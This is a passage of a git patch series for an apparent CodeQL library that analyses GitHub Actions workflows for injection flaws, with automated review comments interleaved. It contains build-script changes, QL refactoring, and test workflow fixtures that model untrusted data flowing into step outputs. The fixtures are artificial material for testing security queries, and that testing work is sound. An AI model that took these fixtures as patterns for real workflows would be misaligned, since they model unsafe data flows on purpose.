/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] -[2024-02-03 10:17:53] Plumbing command codeql database trace-command completed. -[2024-02-03 10:17:53] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. -[2024-02-03 10:17:53] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:53] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db... 
-[2024-02-03 10:17:53] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml -[2024-02-03 10:17:53] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache/version does not exist -[2024-02-03 10:17:53] Tuple pool not found. Clearing relations with cached strings -[2024-02-03 10:17:53] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode clear. -[2024-02-03 10:17:53] Sequence stamp origin is -6222583521912648850 -[2024-02-03 10:17:53] Pausing evaluation to hard-clear memory at sequence stamp o+0 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Pausing evaluation to quickly trim disk at sequence stamp o+1 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Pausing evaluation to zealously trim disk at sequence stamp o+2 -[2024-02-03 10:17:53] Unpausing evaluation -[2024-02-03 10:17:53] Trimming completed (7ms): Purged everything. 
-[2024-02-03 10:17:53] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml -[2024-02-03 10:17:53] Found 8 TRAP files (16.41 KiB) -[2024-02-03 10:17:53] [PROGRESS] dataset import> Importing TRAP files -[2024-02-03 10:17:53] Importing changed-files.yml.trap.gz (1 of 8) -[2024-02-03 10:17:53] Importing inter1.yml.trap.gz (2 of 8) -[2024-02-03 10:17:53] Importing no-flow1.yml.trap.gz (3 of 8) -[2024-02-03 10:17:53] Importing no-flow2.yml.trap.gz (4 of 8) -[2024-02-03 10:17:53] Importing simple1.yml.trap.gz (5 of 8) -[2024-02-03 10:17:53] Importing simple2.yml.trap.gz (6 of 8) -[2024-02-03 10:17:53] Importing test.yml.trap.gz (7 of 8) -[2024-02-03 10:17:53] Importing sourceLocationPrefix.trap.gz (8 of 8) -[2024-02-03 10:17:53] [PROGRESS] dataset import> Merging relations -[2024-02-03 10:17:53] Merging 1 fragment for 'files'. -[2024-02-03 10:17:53] Merged 56 bytes for 'files'. -[2024-02-03 10:17:53] Merging 1 fragment for 'folders'. -[2024-02-03 10:17:53] Merged 80 bytes for 'folders'. -[2024-02-03 10:17:53] Merging 1 fragment for 'containerparent'. -[2024-02-03 10:17:53] Merged 128 bytes for 'containerparent'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_scalars'. -[2024-02-03 10:17:53] Merged 3048 bytes (2.98 KiB) for 'yaml_scalars'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml'. -[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'yaml'. -[2024-02-03 10:17:53] Merging 1 fragment for 'locations_default'. -[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'locations_default'. -[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_locations'. -[2024-02-03 10:17:53] Merged 2664 bytes (2.60 KiB) for 'yaml_locations'. -[2024-02-03 10:17:53] Merging 1 fragment for 'sourceLocationPrefix'. -[2024-02-03 10:17:53] Merged 4 bytes for 'sourceLocationPrefix'. -[2024-02-03 10:17:53] Saving string and id pools to disk. -[2024-02-03 10:17:54] Finished importing TRAP files. 
-[2024-02-03 10:17:54] Read 77.48 KiB of uncompressed TRAP data. -[2024-02-03 10:17:54] Relation data size: 21.45 KiB (merge rate: 1.20 MiB/s) -[2024-02-03 10:17:54] String pool size: 2.05 MiB -[2024-02-03 10:17:54] ID pool size: 1.03 MiB -[2024-02-03 10:17:54] [PROGRESS] dataset import> Finished writing database (relations: 21.45 KiB; string pool: 2.05 MiB). -[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+3 -[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] Plumbing command codeql dataset import completed. -[2024-02-03 10:17:54] [PROGRESS] database finalize> TRAP import complete (817ms). -[2024-02-03 10:17:54] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... -[2024-02-03 10:17:54] [PROGRESS] database cleanup> TRAP files cleaned up (6ms). -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up scratch directory... -[2024-02-03 10:17:54] [PROGRESS] database cleanup> Scratch directory cleaned up (0ms). -[2024-02-03 10:17:54] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml. -[2024-02-03 10:17:54] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode trim. -[2024-02-03 10:17:54] Sequence stamp origin is -6222583518558519910 -[2024-02-03 10:17:54] Pausing evaluation to zealously trim disk at sequence stamp o+0 -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] Trimming completed (2ms): Trimmed disposable data from cache. 
-[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+1 -[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml -[2024-02-03 10:17:54] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml (4ms). -[2024-02-03 10:17:54] Plumbing command codeql dataset cleanup completed. -[2024-02-03 10:17:54] Plumbing command codeql database cleanup completed with status 0. -[2024-02-03 10:17:54] [PROGRESS] database finalize> Finished zipping source archive (3.73 KiB). -[2024-02-03 10:17:54] Plumbing command codeql database finalize completed. -[2024-02-03 10:17:54] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. -[2024-02-03 10:17:54] Terminating normally. diff --git a/ql/src/test-db/log/database-index-files-20240203.101752.962.log b/ql/src/test-db/log/database-index-files-20240203.101752.962.log deleted file mode 100644 index f410634a29ff..000000000000 --- a/ql/src/test-db/log/database-index-files-20240203.101752.962.log +++ /dev/null 
@@ -1,21 +0,0 @@ -[2024-02-03 10:17:52] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:52] Log file was started late. -[2024-02-03 10:17:52] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:52] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:52] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --format=json -[2024-02-03 10:17:53] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] Plumbing command codeql resolve files completed: - [ - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/changed-files.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/inter1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/test.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow2.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple2.yml" - ] -[2024-02-03 10:17:53] [DETAILS] database index-files> Found 7 files. -[2024-02-03 10:17:53] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... 
-[2024-02-03 10:17:53] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:53] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] -[2024-02-03 10:17:53] Terminating normally. 
diff --git a/ql/src/test-db/src.zip b/ql/src/test-db/src.zip deleted file mode 100644 index 9c82ac3a64444a993e3a461dc000184a22d1e3a8..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3816 zcmcImc{r4N8y@S7B{SK=NTkh#nL(1VrA-ZHjHS`3oUF~53^Qa2O^Bj=jVy6c985U& zeHn+5eG6p`2PGa)KF_JzvD?24Noy;#teq+~c`=vh_tIRa?!WW!^|NG ziWLj;R3$WF@PRVmbLC@G8WJxWF2*{5-xFje*R*S{jZdE!ql66TQQ9{;;m$p;g*`U? zCf-^uQULUp%4!G#7t#!jL?f3H3JPDSywe@G3Sk`M`KxcmY65Byc)29G{#GqkqAbEv z_ng;paJl96up=4?$D13oqYYH=$tX04R*c*Yqk$xLHp8l3-mDwm4Uu{KMEcU^u3gX# z!xx#WWf>W7TI-dIB}04f1e(e4t>hI9z8ue)cz6qw6;6Lea%lDGDGZNGtG7AwAL;$d z_%CBH?e2xzWTU{3A2;RQO(K$7&6u6jm%dyH!x!`u;{Dg>`{LVY3IL9DTDgZg^N#94 z*CqE@WSSR{BO3LW9ZYSuXr(_D4YNI>xsX*HNo3EjvRPtlOoI>*=JMeK_F|@4QW#A) zyUM2rb*sJ2f0fL5u3(%Q5_PjAHz+qmGr^lY{2oe?39in9*jVIC0!V8~wQDN^2>ynM zy$2&}R^(CRbS56Lr1de1U%sYC<`E08@P{s~x>3f*T;I|9x)Y47^e!PQGxe_1vm|wi zb4$N_v@O(XE<5{WmIzv1+7Z&i7kB42ZWOGYb3x-%dU93CdT735FUBS2*P-Ps)=2wm zM)50TTmFfn0hpjaDABSoHti&64$R>kVNKRrW;2?|=KbG|vb~(EajfD;$B8>eN*?qce$ue!L(J+@SJcsb!3LQK2&|CQ38rj9$My9!!WL8M7K2DVLhA zSHeZ$_miDJgeu@rV=2`E4`4*6+IZckS!lPs8`^&Ymb827AY2lsEW;u$m@0PgrzWnR z<`F+XIW?JY;M#PU_2B)Kn_@QqY5)GZJsTL}t8nbGkmiaBxiBD;>qx$D`+~238nQ0h zaQ0EJH=L^bL-{6)K6o0m3*?rv^pObUHz{yS3n9NvtUa3fEWg-iQL2NM!zq;v92kgeCd_Oa$Z2Xx)n=E4=#)}}a*w7AZFMEF=}qop6) za0L9AouzYg%1HQ}>K$v5(#jyc`WRW?<9tpn3C!|jR zNaAL1osGGZI}M1W>$WD{Bo8jhChyDekBPhiC92@lAf5TjO5i=@ikX8=lgk2{Heh%O zR9K?BeN>{LbmxgpX+q+|Qt8-QT5dM*%|>*{gy9R>;=xftjm-tdIc2BV; z-O9&+8>eCsiLz~Pq+%>5%y6BYNyKtJ=8$#+>+qZyg zTx01;?Jbr*$VUX>PK}fB5BQ6yN~#qNRQ~GWXXoxo8r(Iryl97ZIn>ujcv3Y6x_x+Y zQA$O=^tA+Q5<2PDlEbaWOc}#$f=L%cu-d>>&o*7j9X>q76n|K#ty|j8I-=^-r@kJX z0=N@eVXe20T1U`mQ=J@m=}$tJwN9xMqL8a@GhqyeZ!XI zei0gIM00*jBIy)G2jAaso_FZtBjf7nw%O>C%zmG|3wqhn+2$sllbcGRB`@jL^EG;J z`n}cVWRV(VXQ#Oi?_=eaJ-O+Y5s7?I# Date: Mon, 5 Feb 2024 10:48:53 +0100 Subject: [PATCH 005/707] Add testproj to gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) 
diff --git a/.gitignore b/.gitignore
index e43b0f988953..1233930f4a4f 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1 +1,2 @@
 .DS_Store
+**/*.testproj
From 3902a55fbba9a86b3a85113196f3c219f29428ca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 10:52:17 +0100 Subject: [PATCH 006/707] Update build test db script
--- build-dbs.sh | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/build-dbs.sh b/build-dbs.sh
index dac4753f4d61..073fcc40b441 100755
--- a/build-dbs.sh
+++ b/build-dbs.sh
@@ -1,5 +1,5 @@
 #!/bin/bash
-rm -rf ql/src/test-db || true
-rm -rf ql/lib/test-db || true
-codeql database create ql/src/test-db -l yaml -s ql/src/test
-codeql database create ql/lib/test-db -l yaml -s ql/lib/test
+rm -rf ql/src/test/test.testproj || true
+rm -rf ql/lib/test/test.testproj || true
+codeql database create ql/src/test/test.testproj -l yaml -s ql/src/test
+codeql database create ql/lib/test/test.testproj -l yaml -s ql/lib/test
From b3eae71f951733ff4a13828d37ed6977c7e92392 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 13:30:46 +0100 Subject: [PATCH 007/707] fix test
--- ql/src/test/test.yml | 1 + 1 file changed, 1 insertion(+)
diff --git a/ql/src/test/test.yml b/ql/src/test/test.yml
index 8f9cbf3b6440..554a09f21059 100644
--- a/ql/src/test/test.yml
+++ b/ql/src/test/test.yml
@@ -18,6 +18,7 @@ jobs:
 - id: step1
 env:
 BODY: ${{ steps.step0.outputs.value}}
+ shell: powershell
 run: |
 Write-Output "::set-output name=MSG::$ENV{BODY}"
 - id: step2
From 0398fbd0d71cd0b456236c93154d92b07521a939 Mon Sep 17 00:00:00 2001
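Review bot: `|| true` on both `rm -rf` lines masks the only failures `rm -f` can still report (a permission error, for instance), since a missing path already exits 0, and the script has no `set -e`, so a failed first `codeql database create` does not stop the second and both databases may be built on whatever stale `test.testproj` survived. I would add `set -euo pipefail` directly after the shebang and drop the two `|| true` suffixes. The relative paths also assume the repository root as the working directory, so a `cd "$(dirname "$0")" || exit 1` guard would make the script location-independent.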
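Review bot: With `shell: powershell` now set on step1, the script's `$ENV{BODY}` is not PowerShell's environment-variable syntax; PowerShell expands `$ENV` as an ordinary, unset variable and leaves `{BODY}` literal, so the step would not actually forward the `BODY` value into the `set-output` command. If the fixture is meant to model an env-to-output flow, `Write-Output "::set-output name=MSG::$env:BODY"` is the form that runs as intended; if it only needs to satisfy a text pattern used by the library, a comment saying so would prevent a later "fix". This is inferred from the fixture alone, as how the step text is matched is not visible here.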
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 18:04:37 +0100 Subject: [PATCH 008/707] Refactor AST layer
--- ql/lib/codeql/actions/Ast.qll | 206 ++++++++---------- .../actions/controlflow/internal/Cfg.qll | 63 +++--- .../codeql/actions/dataflow/FlowSources.qll | 24 +- .../dataflow/internal/DataFlowPrivate.qll | 5 +- 4 files changed, 142 insertions(+), 156 deletions(-)
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 967a969a6b72..d2c7fdd45010 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -1,37 +1,49 @@
 private import codeql.actions.ast.internal.Actions
 private import codeql.Locations
+/**
+ * Base class for the AST tree.
+ * Based on YamlNode from the Yaml library but making mapping values children of the mapping keys:
+ * eg: top:
+ * key: value
+ * According to the Yaml library, both `key` and `value` are direct children of `top`
+ * This Tree implementation makes `key` child od `top` and `value` child of `key`
+ */
 class AstNode instanceof YamlNode {
- AstNode getParentNode() {
- if exists(YamlMapping m | m.maps(_, this))
- then exists(YamlMapping m | m.maps(result, this))
- else result = super.getParentNode()
- }
-
- AstNode getAChildNode() {
- if this instanceof YamlMapping
- then this.(YamlMapping).maps(result, _)
- else
- if this instanceof YamlCollection
- then result = super.getChildNode(_)
- else
- if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _))
- then exists(YamlMapping m | m.maps(this, result))
- else none()
- }
-
- AstNode getChildNodeByOrder(int i) {
- result =
- rank[i](Expression child, Location l |
- child = this.getAChildNode() and
- child.getLocation() = l
- |
- child
- order by
- l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString()
- )
- }
-
+ AstNode getParentNode() { result = super.getParentNode() }
+
+ // AstNode getParentNode() {
+ // if exists(YamlMapping m | m.maps(_, this))
+ // then exists(YamlMapping m | m.maps(result, this))
+ // else result = super.getParentNode()
+ // }
+ AstNode getAChildNode() { result = super.getAChildNode() }
+
+ // AstNode getAChildNode() {
+ // if this instanceof YamlMapping
+ // then this.(YamlMapping).maps(result, _)
+ // else
+ // if this instanceof YamlCollection
+ // then result = super.getChildNode(_)
+ // else
+ // if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _))
+ // then exists(YamlMapping m | m.maps(this, result))
+ // else none()
+ // }
+ // /**
+ // * This should be getAChildNode(int i)
+ // */
+ // AstNode getChildNodeByOrder(int i) {
+ // result =
+ // rank[i](Expression child, Location l |
+ // child = this.getAChildNode() and
+ // child.getLocation() = l
+ // |
+ // child
+ // order by
+ // l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString()
+ // )
+ // }
 string toString() { result = super.toString() }
 string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() }
@@ -39,15 +51,24 @@ class AstNode instanceof YamlNode {
 Location getLocation() { result = super.getLocation() }
 }
-class Statement extends AstNode {
- // narrow down to something that is a statement
- // A statement is a group of expressions and/or statements that you design to carry out a task or an action.
- // Any statement that can return a value is automatically qualified to be used as an expression.
-}
+/**
+ * A statement is a group of expressions and/or statements that you design to carry out a task or an action.
+ * Any statement that can return a value is automatically qualified to be used as an expression.
+ */
+class Statement extends AstNode { }
+
+/**
+ * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value.
+ */
+class Expression extends Statement { }
+
+/**
+ * A Github Actions Workflow
+ */
+class WorkflowStmt extends Statement instanceof Actions::Workflow {
+ JobStmt getAJob() { result = super.getJob(_) }
-class Expression extends Statement {
- // narrow down to something that is an expression
- // An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value.
+ JobStmt getJob(string id) { result = super.getJob(id) }
 }
 /**
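Review bot: The new doc comment on `AstNode` describes a tree in which mapping values hang off their keys, but the new `getParentNode()` and `getAChildNode()` bodies simply delegate to `YamlNode`, which is exactly the parent/child relation the comment says this class departs from, so one of the two is now wrong. Either restore the mapping-aware bodies or reword the comment to state that the class currently mirrors `YamlNode` and the key/value tree is planned. The commented-out former implementations (`// AstNode getParentNode() {`, `// AstNode getAChildNode() {`, `// AstNode getChildNodeByOrder(int i) {`) should be dropped rather than kept inside the class body, since git history preserves them. Also `child od \`top\`` should read `child of \`top\``.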
@@ -60,19 +81,17 @@ class JobStmt extends Statement instanceof Actions::Job {
 */
 string getId() { result = super.getId() }
- /** Gets the human-readable name of this job, if any, as a string. */
- string getName() {
- result = super.getId()
- or
- not exists(string s | s = super.getId()) and result = "unknown"
- }
-
 /** Gets the step at the given index within this job. */
 StepStmt getStep(int index) { result = super.getStep(index) }
 /** Gets any steps that are defined within this job. */
 StepStmt getAStep() { result = super.getStep(_) }
+ /**
+ * Gets a needed job.
+ * eg:
+ * - needs: [job1, job2]
+ */
 JobStmt getNeededJob() {
 exists(Actions::Needs needs |
 needs.getJob() = this and
@@ -80,34 +99,35 @@ class JobStmt extends Statement instanceof Actions::Job {
 )
 }
- Expression getJobOutputExpr(string varName) {
- this.(Actions::Job)
- .lookup("outputs")
- .(YamlMapping)
- .maps(any(YamlScalar a | a.getValue() = varName), result)
- }
-
- JobOutputStmt getJobOutputStmt() { result = this.(Actions::Job).lookup("outputs") }
-
- Statement getSuccNode(int i) {
- result =
- rank[i](Expression child, Location l |
- (child = this.getAStep() or child = this.getJobOutputStmt()) and
- l = child.getLocation()
- |
- child
- order by
- l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString()
- )
- }
+ /**
+ * Gets the declaration of the outputs for the job.
+ * eg:
+ * out1: ${steps.foo.bar}
+ * out2: ${steps.foo.baz}
+ */
+ JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") }
 }
+/**
+ * Declaration of the outputs for the job.
+ * eg:
+ * out1: ${steps.foo.bar}
+ * out2: ${steps.foo.baz}
+ */
 class JobOutputStmt extends Statement instanceof YamlMapping {
 JobStmt job;
 JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this }
- StepOutputAccessExpr getSuccNode(int i) { result = this.(YamlMapping).getValueNode(i) }
+ YamlMapping asYamlMapping() { result = this }
+
+ /**
+ * Gets a specific value expression
+ * eg: ${steps.foo.bar}
+ */
+ Expression getOutputExpr(string id) {
+ this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = id), result)
+ }
 }
 /**
@@ -116,15 +136,7 @@ class JobOutputStmt extends Statement instanceof YamlMapping {
 class StepStmt extends Statement instanceof Actions::Step {
 string getId() { result = super.getId() }
- string getName() {
- result = super.getId()
- or
- not exists(string s | s = super.getId()) and result = "unknown"
- }
-
 JobStmt getJob() { result = super.getJob() }
-
- abstract AstNode getSuccNode(int i);
 }
 /**
@@ -145,44 +157,12 @@ class UsesExpr extends StepStmt, Expression {
 result = with.lookup(key)
 )
 }
-
- Expression getArgumentByOrder(int i) {
- exists(Actions::With with |
- with.getStep() = uses.getStep() and
- result =
- rank[i](Expression child, Location l |
- child = with.lookup(_) and l = child.getLocation()
- |
- child
- order by
- l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString()
- )
- )
- }
-
- Expression getAnArgument() {
- exists(Actions::With with |
- with.getStep() = this and
- result = with.lookup(_)
- )
- }
-
- override AstNode getSuccNode(int i) { result = this.getArgumentByOrder(i) }
 }
 /**
- * An argument passed to a UsesExpr.
+ * A Run step represents the evaluation of a provided script
 */
-class ArgumentExpr extends Expression {
- UsesExpr uses;
-
- ArgumentExpr() { this = uses.getAnArgument() }
-}
-
-/**
- * A Run step represents a call to an inline script or executable on the runner machine.
- */
-class RunExpr extends StepStmt {
+class RunExpr extends StepStmt, Expression {
 Actions::Run scriptExpr;
 RunExpr() { scriptExpr.getStep() = this }
@@ -190,12 +170,10 @@ class RunExpr extends StepStmt {
 Expression getScriptExpr() { result = scriptExpr }
 string getScript() { result = scriptExpr.getValue() }
-
- override AstNode getSuccNode(int i) { result = this.getScriptExpr() and i = 0 }
 }
 /**
- * A YAML string containing a workflow expression.
+ * Evaluation of a workflow expression ${{}}.
 */
 class ExprAccessExpr extends Expression instanceof YamlString {
 string expr;
@@ -208,7 +186,7 @@ class ExprAccessExpr extends Expression instanceof YamlString {
 }
 /**
- * A ExprAccessExpr where the expression references a step output.
+ * A ExprAccessExpr where the expression evaluated is a step output read.
 * eg: `${{ steps.changed-files.outputs.all_changed_files }}`
 */
 class StepOutputAccessExpr extends ExprAccessExpr {
@@ -230,7 +208,7 @@ class StepOutputAccessExpr extends ExprAccessExpr {
 }
 /**
- * A ExprAccessExpr where the expression references a job output.
+ * A ExprAccessExpr where the expression evaluated is a job output read.
 * eg: `${{ needs.job1.outputs.foo}}`
 */
 class JobOutputAccessExpr extends ExprAccessExpr {
@@ -250,7 +228,7 @@ class JobOutputAccessExpr extends ExprAccessExpr {
 exists(JobStmt job |
 job.getId() = jobId and
 job.getLocation().getFile() = this.getLocation().getFile() and
- job.getJobOutputExpr(varName) = result
+ job.getOutputStmt().getOutputExpr(varName) = result
 )
 }
 }
diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
index 8b6696fe777c..c549eb401980 100644
--- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
+++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
@@ -139,31 +139,40 @@ private import CfgImpl
 private import Completion
 private import CfgScope
-// Trees are what end up creating Cfg::Node objects and therefore DataFlow::Node objects.
-// Its also required that there is parent/child relationships between nodes so orphans nodes will not appear as either Cfg::Node or DataFlow::Node.
-// For example
-// - ArgumentExpr should be children of UsesExpr, and UsesExpr should be children of StepStmt.
-// TODO: We need to make VarAccess expressions part ot the tree as they are currently orphans
-private class CfgNodeTree extends StandardPreOrderTree instanceof AstNode {
- override AstNode getChildNode(int i) { result = super.getChildNodeByOrder(i) }
+private class JobTree extends StandardPreOrderTree instanceof JobStmt {
+ override ControlFlowTree getChildNode(int i) {
+ result =
+ rank[i](Expression child, Location l |
+ (child = super.getAStep() or child = super.getOutputStmt()) and
+ l = child.getLocation()
+ |
+ child
+ order by
+ l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString()
+ )
+ }
+}
+
+private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt {
+ override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) }
+}
+
+private class UsesTree extends StandardPreOrderTree instanceof UsesExpr {
+ override ControlFlowTree getChildNode(int i) {
+ result =
+ rank[i](Expression child, Location l |
+ child = super.getArgument(_) and l = child.getLocation()
+ |
+ child
+ order by
+ l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString()
+ )
+ }
+}
+
+private class RunTree extends StandardPreOrderTree instanceof RunExpr {
+ override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 }
 }
-// private class JobStmtTree extends StandardPreOrderTree instanceof JobStmt {
-// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) }
-// }
-//
-// private
class StepStmtTree extends StandardPreOrderTree instanceof StepStmt {
-// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) }
-// }
-//
-// private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt {
-// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) }
-// }
-//
-// // TODO: Do we need this or we can just care about the ExprAccessExpr
-// private class ArgumentTree extends LeafTree instanceof ArgumentExpr { }
-//
-// private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { }
-//
-// private class StepOutputAccessTree extends LeafTree instanceof StepOutputAccessExpr { }
-//
-// private class JobOutputAccessTree extends LeafTree instanceof JobOutputAccessExpr { }
\ No newline at end of file
+
+private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { }
+
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 5ce82a134ce6..b2ab51e28fa8 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -19,18 +19,6 @@ abstract class RemoteFlowSource extends SourceNode {
 override string getThreatModel() { result = "remote" }
 }
-private class ChangedFilesSource extends RemoteFlowSource {
- ChangedFilesSource() {
- exists(UsesExpr uses |
- uses.getTarget() = "tj-actions/changed-files" and
- uses.getVersion() = ["v1", "v20", "v30", "v40"] and
- uses = this.asExpr()
- )
- }
-
- override string getSourceType() { result = "User-controlled list of changed files" }
-}
-
 bindingset[context]
 private predicate isExternalUserControlledIssue(string context) {
 context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or
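Review bot: `JobTree.getChildNode` and `UsesTree.getChildNode` carry the same `rank[i](... order by l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString())` expression verbatim, the same ordering the deleted `Ast.qll` predicates used, so the two trees can drift apart silently. A single shared, documented ordering helper that both trees call would keep them in step; note that both lists compare `getEndColumn()` before `getEndLine()`, which only matters as a tie-break after the start position but reads like a transposition. The old comment explaining why every node needs a parent in a tree (orphans never become `Cfg::Node`s) and its TODO about orphaned `VarAccess` expressions were removed with `CfgNodeTree`; with the new trees an `ExprAccessExpr` appears to reach the CFG only as a `UsesTree` argument, a `RunTree` script or a `JobOutputTree` value, so a comment stating that intended reachability would help the next reader.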
